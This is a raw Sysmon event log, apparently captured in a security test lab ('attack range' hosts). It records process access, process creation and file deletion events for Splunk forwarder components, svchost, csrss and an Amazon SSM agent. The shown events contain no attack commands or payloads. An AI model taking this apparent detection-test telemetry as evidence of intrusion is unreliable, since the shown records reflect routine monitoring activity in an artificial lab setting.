11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-16B1-6216-F804-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16B1-6216-F804-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.887{4F8D34B0-16B1-6216-F804-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.401{4F8D34B0-16B1-6216-F704-000000003902}1308844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16B1-6216-F704-000000003902}1308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-16B1-6216-F704-000000003902}1308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.214{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16B1-6216-F704-000000003902}1308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.215{4F8D34B0-16B1-6216-F704-000000003902}1308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.042{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF36D7AC7EBA715D646D487781132371,SHA256=CD291F08196D823DD6A21F41CAEB53849620B4E40A62210EE2C29E29BFF3E8C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:49.253{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-155MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:49.168{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8AF20E083F786B6EAF3885D36CF340DA,SHA256=F7C1E0E0F97D8E686F3730D97E6E8B9DF1E51D2B7C3AF5311EB7F87582CC0CC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:49.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1883744B60C08CA84E0B787996B53746,SHA256=1400A68C01F6377EDDD5693C9D64DD85E77155A849027DF36F9B05FAB45DC225,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:49.031{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CBD4741B82AF9C4B23490A2365EA3BA,SHA256=29528670B2E8FBE5DD7161DDE1291A90EAF56E904D4CA2BF3CD640B0E4405328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:50.386{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A64335F95CD35AD00264E480F1B7435,SHA256=88CE920F9887FB97531DCE88D6D9308FC834F4A31D81FC5DB13EAC5C4F9AF349,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:50.371{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D89326AFCF7A438B124FAF83FAE01A1,SHA256=A3AE883E4FE2E8CD1431E462021EFC442BEA74CD8500C42FC047151582FFC1D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:50.073{4F8D34B0-16B1-6216-F804-000000003902}300932C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 